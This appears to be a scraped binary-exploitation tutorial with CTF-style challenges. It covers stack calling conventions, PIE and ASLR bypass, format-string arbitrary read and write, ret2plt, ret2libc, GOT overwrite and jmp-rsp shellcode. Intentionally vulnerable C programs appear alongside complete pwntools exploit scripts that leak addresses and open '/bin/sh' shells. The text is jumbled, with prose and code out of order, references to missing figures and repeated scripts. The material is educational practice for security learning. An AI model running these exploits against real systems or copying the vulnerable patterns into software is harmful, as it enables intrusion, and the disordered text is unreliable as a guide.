0x080491e2 68dec0adde push 0xdeadc0de
0x080491e7 68efbeadde push 0xdeadbeef
0x080491ec e871ffffff call sym.vuln
[...]
0x080491f7 6810efcdab push 0xabcdef10
0x080491fc 6878563412 push 0x12345678
0x08049201 68dec0adde push 0xdeadc0de
0x08049206 e857ffffff call sym.vuln
It's just as simple - push
them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln
and print out the stack.
[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc 0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d
So it becomes quite clear how more parameters are placed on the stack:
return pointer param1 param2 param3 [...] paramN
0x00401170 ba0dd0dec0 mov edx, 0xc0ded00d
0x00401175 bedec0adde mov esi, 0xdeadc0de
0x0040117a bfefbeadde mov edi, 0xdeadbeef
0x0040117f e89effffff call sym.vuln
0x00401184 ba10efcdab mov edx, 0xabcdef10
0x00401189 be78563412 mov esi, 0x12345678
0x0040118e bfdec0adde mov edi, 0xdeadc0de
0x00401193 e88affffff call sym.vuln
So as well as rdi
, we also push to rdx
and rsi
(or, in this case, their lower 32 bits).
Just to show that it is in fact ultimately rdi
and not edi
that is used, I will alter the original one-parameter code to utilise a bigger number:
#include <stdio.h>
void vuln(long check) {
if(check == 0xdeadbeefc0dedd00d) {
puts("Nice!");
}
}
int main() {
vuln(0xdeadbeefc0dedd00d);
}
If you disassemble main
, you can see it disassembles to
movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln
Position Independent Code
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Luckily, this does not mean it's impossible to exploit. PIE executables are based around relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main
is located 0x128
bytes in memory after the base address of the binary, and you somehow find the location of main
, you can simply subtract 0x128
from this to get the base address and from the addresses of everything else.
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value off the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Due to the way PIE randomisation works, the base address of a PIE executable will always end in the hexadecimal characters 000
. This is because pages are the things being randomised in memory, which have a standard size of 0x1000
. Operating Systems keep track of page tables which point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000
should probably be the first thing you do if your exploit is not working as you expected.
Utilising Calling Conventions
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag()
will be part of the stack frame for the next function as it is expected to be there - just instead of using push
instructions we just overwrote them manually.
from pwn import *
p = process('./vuln-32')
payload = b'A' * 52 # Padding up to EIP
payload += p32(0x080491c7) # Address of flag()
payload += p32(0x0) # Return address - don't care if crashes when done
payload += p32(0xdeadc0de) # First parameter
payload += p32(0xc0ded00d) # Second parameter
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi
and rsi
as we have two parameters).
We have to fill the registers before the function is called
from pwn import *
p = process('./vuln-64')
POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9
payload = b'A' * 56 # Padding
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(0xdeadc0de) # value into rdi -> first param
payload += p64(POP_RSI_R15) # pop rsi; pop r15; ret
payload += p64(0xc0ded00d) # value into rsi -> first param
payload += p64(0x0) # value into r15 -> not important
payload += p64(0x40116f) # Address of flag()
payload += p64(0x0)
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
Using format string
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Everything's as we expect.
As last time, first we set everything up.
Now we just need a leak. Let's try a few offsets.
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
We can see the base address is 0x565ef000
and the leaked value is 0x565f01d5
. Therefore, subtracting 0x1d5
from the leaked address should give us the binary. Let's leak the value and get the base address.
Now we just need to send the exploit payload.
Same deal, just 64-bit. Try it out :)
Just as we did for PIE, except this time we print the address of system.
Yup, does what we expected.
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF
object that makes our lives easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
Now we can finally ret2libc, using the libc
ELF
object to really simplify it for us:
Try it yourself :)
If you prefer, you could have changed the following payload to be more pwntoolsy:
Instead, you could do:
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
Exploiting PIE with a given leak
Pretty simple - we print the address of main
, which we can read and calculate the base address from. Then, using this, we can calculate the address of win()
itself.
Let's just run the script to make sure it's the right one :D
Yup, and as we expected, it prints the location of main
.
First, let's set up the script. We create an ELF
object, which becomes very useful later on, and start the process.
Now we want to take in the main
function location. To do this we can simply receive up until it (and do nothing with that) and then read it.
Now we'll use the ELF
object we created earlier and set its base address. The sym
dictionary returns the offsets of the functions from binary base until the base address is set, after which it returns the absolute address in memory.
In this case, elf.sym['main']
will return 0x11b9
; if we ran it again, it would return 0x11b9
+ the base address. So, essentially, we're subtracting the offset of main
from the address we leaked to get the base of the binary.
Now we know the base we can just call win()
.
And does it work?
Awesome!
From the leak address of main
, we were able to calculate the base address of the binary. From this we could then calculate the address of win
and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.
Try this for yourself first, then feel free to check the solution. Same source, same challenge.
This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.
We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets()
takes in as much data as we want.
All the basic setup
Now we want to send a payload that leaks the real address of puts
. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out it's actual location. This is because in C string arguments for functions actually take a pointer to where the string can be found, so pointing it to the GOT entry (which we know the location of) will print it out.
But why is there a main
there? Well, if we set the return address to random jargon, we'll leak libc base but then it'll crash; if we call main
again, however, we essentially restart the binary - except we now know libc
base so this time around we can do a ret2libc.
Remember that the GOT entry won't be the only thing printed - puts
, and most functions in C, print until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32()
to interpret them as a little-endian number. After that we ignore the the rest of the values as well as the Come get me
from calling main
again.
From here, we simply calculate libc base again and perform a basic ret2libc:
And bingo, we have a shell!
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P
#include <stdio.h>
void vuln() {
char buffer[20];
printf("What's your name?\n");
gets(buffer);
printf("Nice to meet you ");
printf(buffer);
printf("\n");
puts("What's your message?");
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
$ ./vuln-32
What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
$ r2 -d -A vuln-32
Process with PID 5548 started...
= attach 5548 5548
bin.baddr 0x565ef000
0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}')
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
#include <stdio.h>
#include <stdlib.h>
void vuln() {
char buffer[20];
printf("System is at: %lp\n", system);
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
$ ./vuln-32
System is at: 0xf7de5f00
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
binsh = next(libc.search(b'/bin/sh'))
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)
p.sendline(rop.chain())
#include <stdio.h>
int main() {
vuln();
return 0;
}
void vuln() {
char buffer[20];
printf("Main Function is at: %lx\n", main);
gets(buffer);
}
void win() {
puts("PIE bypassed! Great job :D");
}
$ ./vuln-32
Main Function is at: 0x5655d1b9
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
#include <stdio.h>
void vuln() {
puts("Come get me");
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvline() # just receive the first output
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'], # exit is not required here, it's just nicer
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvline()
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
Address Space Layout Randomisation
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc
's equivalent of PIE - every time you run a binary, libc
(and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc
PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependant on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any different at all if you had ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system
for a ret2libc).
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the GOT entry of a specific function.
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000
.
Shellcode, but without the guesswork
The problem with shellcode exploits as they are is that the locations of it are questionable - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input again - except this time, we specify the location as somewhere we control.
If you think about it, once the return pointer is popped off the stack ESP will points at whatever is after it in memory - after all, that's the entire basis of ROP. But what if we put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return pointer with a jmp esp
gadget! Once it gets popped off, ESP will point at the shellcode and thanks to the jmp esp
it will be executed!
ret2reg extends the use of jmp esp
to the use of any register that happens to point somewhere you need it to.
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO simply moves the GOT above the program's variables, meaning you can't overflow into the GOT. This, of course, does not prevent format string overwrites.
Full RELRO makes the GOT completely read-only, so even format string exploits cannot overwrite it. This is not the default in binaries due to the fact that it can make it take much longer to load as it need to resolve all the function addresses at once.
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address
will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf
or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
In C, certain functions can take "format specifier" within strings. Let's look at an example:
int value = 1205;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);
This prints out:
Decimal: 1205
Float: 1205.000000
Hex: 0x4b5
So, it replaced %d
with the value, %f
with the float value and %x
with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:
int value = 1205;
printf("%x %x %x", value, value, value);
As expected, we get
4b5 4b5 4b5
What happens, however, if we don't have enough arguments for all the format specifiers?
int value = 1205;
printf("%x %x %x", value);
4b5 5659b000 565981b0
Erm... what happened here?
The key here is that printf
expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf
.
#include <stdio.h>
int main(void) {
char buffer[30];
gets(buffer);
printf(buffer);
return 0;
}
If we run this normally, it works at expected:
$ ./test
yes
yes
But what happens if we input format string specifieres, such as %x
?
$ ./test
%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520
It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.
To print the same value 3 times, using
printf("%x %x %x", value, value, value);
Gets tedious - so, there is a better way in C.
printf("%1$x %1$x %1$x", value);
The 1$
between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p
- instead of sending %p %p %p %p %p %p
we can just do %6$p
. This allows us to be much more efficient.
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s
format specifier, it's the pointer that gets passed to it. That means instead of reading a value of the stack, you read the value in the memory address it points at.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
$ ./test
%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825
You may notice that the last two values contain the hex values of %x
. That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address then point %s
at it, we can get an arbitrary write!
$ ./vuln
ABCD|%6$p
ABCD|0x44434241
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that write the location of the ELF file and reads it with %s
- if all goes well, it should read the first bytes of the file, which is always \x7fELF
. Start with the basics:
from pwn import *
p = process('./vuln')
payload = p32(0x41424344)
payload += b'|%6$p'
p.sendline(payload)
log.info(p.clean())
$ python3 exploit.py
[+] Starting local process './vuln': pid 3204
[*] b'DCBA|0x41424344'
Nice it works. The base address of the binary is 0x8048000
, so let's replace the 0x41424344
with that and read it with %s
:
from pwn import *
p = process('./vuln')
payload = p32(0x8048000)
payload += b'|%6$s'
p.sendline(payload)
log.info(p.clean())
It doesn't work.
The reason it doesn't work is that printf
stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
from pwn import *
p = process('./vuln')
payload = b'%8$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
Let's break down the payload:
We add 4 |
because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p
because the start of the buffer is generally at %6$p
. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p
.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3255
[*] b'0x8048000||||'
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
Now let's replace the p
with an s
.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3326
[*] b'\x7fELF\x01\x01\x01||||'
Of course, %s
will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01
.
Luckily C contains a rarely-used format specifier %n
. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written an also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000
to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.
#include <stdio.h>
int auth = 0;
int main() {
char password[100];
puts("Password: ");
fgets(password, sizeof password, stdin);
printf(password);
printf("Auth is %i\n", auth);
if(auth == 10) {
puts("Authenticated!");
}
}
Simple - we need to overwrite the variable auth
with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets
.
As it's a global variable, it's within the binary itself. We can check the location using readelf
to check for symbols.
$ readelf -s auth | grep auth
34: 00000000 0 FILE LOCAL DEFAULT ABS auth.c
57: 0804c028 4 OBJECT GLOBAL DEFAULT 24 auth
Location of auth
is 0x0804c028
.
We're lucky there's no null bytes, so there's no need to change the order.
$ ./auth
Password:
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20702520
Buffer is the 7th %p
.
from pwn import *
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
And easy peasy:
[+] Starting local process './auth': pid 4045
Password:
[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!
As you can expect, pwntools has a handy feature for automating %n
format string exploits:
payload = fmtstr_payload(offset, {location : value})
The offset
in this case is 7
because the 7th %p
read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
payload = fmtstr_payload(7, {AUTH : 10})
You can also grab the location of the auth
symbol with pwntools:
elf = ELF('./auth')
AUTH = elf.sym['auth']
Check out the pwntools tutorials for more cool features
Bypassing ASLR
The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc
, the C standard library) to provide the bulk of the fucntionality.
For example, each ELF file will not carry their own version of puts
compiled within it - it will instead dynamically link to the puts
of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.
Not quite.
The problem with this approach is it requires libc
to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLR exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts()
in C and compile it as an ELF executable, it is not actually puts()
- instead, it gets compiled as puts@plt
. Check it out in GDB:
Why does it do that?
Well, as we said, it doesn't know where puts
actually is - so it jumps to the PLT entry of puts
instead. From here, puts@plt
does some very specific things:
If there is a GOT entry for puts
, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc
functions. puts@got
, for example, will contain the address of puts
in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so
(also called the dynamic linker/loader) to get the function address and stores it in the GOT.
Well, there are two key takeaways from the above explanation:
Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc
, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc
function, for example system
, we can just redirect execution to its PLT entry and it will be the equivalent of calling system
directly; no need to jump into libc
.
The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc
function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc
function and therefore bypass ASLR.
There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be return but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.
A ret2plt is a common technique that involves calling puts@plt
and passing the GOT entry of puts as a parameter. This causes puts
to print out its own address in libc
. You then set the return address to the function you are exploiting in order to call it again and enable you to
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)
This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.
payload = p32(elf.got['puts']) # p64() if 64-bit
payload += b'|'
payload += b'%3$s' # The third parameter points at the start of the buffer
# this part is only relevant if you need to call the function again
payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])
# Send it off...
p.recvuntil(b'|') # This is not required
puts_leak = u32(p.recv(4)) # 4 bytes because it's 32-bit
The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in libc
of functions you use and stores them in the GOT
Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt
is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc
base
Hijacking functions
You may remember that the GOT stores the actual locations in libc
of functions. Well, if we could overwrite an entry, we could gain code execution that way. Imagine the following code:
Not only is there a buffer overflow and format string vulnerability here, but say we used that format string to overwrite the GOT entry of printf
with the location of system
. The code would essentially look like the following:
Bit of an issue? Yes. Our input is being passed directly to system
.
The very simplest of possible GOT-overwrite binaries.
Infinite loop which takes in your input and prints it out to you using printf
- no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
As per usual, set it all up
Now, to do the %n
overwrite, we need to find the offset until we start reading the buffer.
Looks like it's the 5th.
Yes it is!
Now, next time printf
gets called on your input it'll actually be system
!
If the buffer is restrictive, you can always send /bin/sh
to get you into a shell and run longer commands.
You'll never guess. That's right! You can do this one by yourself.
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously.
Super standard binary.
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets
again. Most importantly, we will tell gets
to write the data it receives to a section of the binary. We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT entry to gets
, and when it receives the shellcode we send it will write the shellcode into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the return address of our call to gets
to where we wrote the shellcode, perfectly executing what we just inputted.
I wonder what you could do with this.
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets
as the location of the PLT would be unknown without a leak - same problem with writing to the GOT.
Thank to and from the HackTheBox Discord server, I found out that the GOT often has Executable permissions simply because that's the default permissions when there's no NX. If you have a more recent kernel, such as 5.9.0
, the default is changed and the GOT will not have X permissions.
As such, if your exploit is failing, run uname -r
to grab the kernel version and check if it's 5.9.0
; if it is, you'll have to find another RWX region to place your shellcode (if it exists!).
You can ignore most of it as it's mostly there to accomodate the existence of jmp rsp
- we don't actually want it called, so there's a negative if
statement.
Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret
has occured, so your shellcode goes after it.
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after the RIP equivalent to something like
Where 0x20
is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!
The 10
is just a placeholder. Once we hit the pause()
, we attach with radare2 and set a breakpoint on the ret
, then continue. Once we hit it, we find the beginning of the A
string and work out the offset between that and the current value of RSP - it's 128
!
We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp
will change, so you might have to leak PIE base!
Interfacing directly with the kernel
A syscall is a system call, and is how the program enters the kernel in order to carry out specific tasks such as creating processes, I/O and any others they would require kernel-level access.
Browsing the , you may notice that certain syscalls are similar to libc functions such as open()
, fork()
or read()
; this is because these functions are simply wrappers around the syscalls, making it much easier for the programmer.
On Linux, a syscall is triggered by the int80
instruction. Once it's called, the kernel checks the value stored in RAX - this is the syscall number, which defines what syscall gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc and every parameter has a different meaning for the different syscalls.
A notable syscall is the execve
syscall, which executes the program passed to it in RDI. RSI and RDX hold arvp
and envp
respectively.
This means, if there is no system()
function, we can use execve
to call /bin/sh
instead - all we have to do is pass in a pointer to /bin/sh
to RDI, and populate RSI and RDX with 0
(this is because both argv
and envp
need to be NULL
to pop a shell).
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret
instruction, e.g. pop rdi; ret
. We can manipulate the ret
of these gadgets in such a way as to string together a large chain of them to do what we want.
Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret
gadget.
What happens is fairly obvious - 0x10
gets popped into rdi
as it is at the top of the stack during the pop rdi
. Once the pop
occurs, rsp
moves:
And since ret
is equivalent to pop rip
, 0x5655576724
gets moved into rip
. Note how the stack is laid out for this.
When we overwrite the return pointer, we overwrite the value pointed at by rsp
. Once that value is popped, it points at the next value at the stack - but wait. We can overwrite the next value in the stack.
Let's say that we want to exploit a binary to jump to a pop rdi; ret
gadget, pop 0x100
into rdi
then jump to flag()
. Let's step-by-step the execution.
On the original ret
, which we overwrite the return pointer for, we pop the gadget address in. Now rip
moves to point to the gadget, and rsp
moves to the next memory address.
rsp
moves to the 0x100
; rip
to the pop rdi
. Now when we pop, 0x100
gets moved into rdi
.
RSP moves onto the next items on the stack, the address of flag()
. The ret
is executed and flag()
is called.
Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip
in ret
). If we want to pop 0x10
into rdi
and then jump to 0x16
, our payload would look like this:
Note if you have multiple pop
instructions, you can just add more values.
We can use the tool to find possible gadgets.
Combine it with grep
to look for specific registers.
char buffer[20];
gets(buffer);
printf(buffer);
char buffer[20];
gets(buffer);
system(buffer);
#include <stdio.h>
void vuln() {
char buffer[300];
while(1) {
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
puts("");
}
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
$ ./got_overwrite
%p %p %p %p %p %p
0x12c 0xf7fa7580 0x8049191 0x340 0x25207025 0x70252070
$./got_overwrite
%5$p
0x70243525
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.interactive()
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.sendline('/bin/sh')
p.interactive()
#include <stdio.h>
void vuln() {
char buffer[20];
puts("Give me the input");
gets(buffer);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
#include <stdio.h>
int test = 0;
int main() {
char input[100];
puts("Get me with shellcode and RSP!");
gets(input);
if(test) {
asm("jmp *%rsp");
return 0;
}
else {
return 0;
}
}
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
# we use elf.search() because we don't need those instructions directly,
# just anu sequence of \xff\xe4
jmp_rsp = next(elf.search(asm('jmp rsp')))
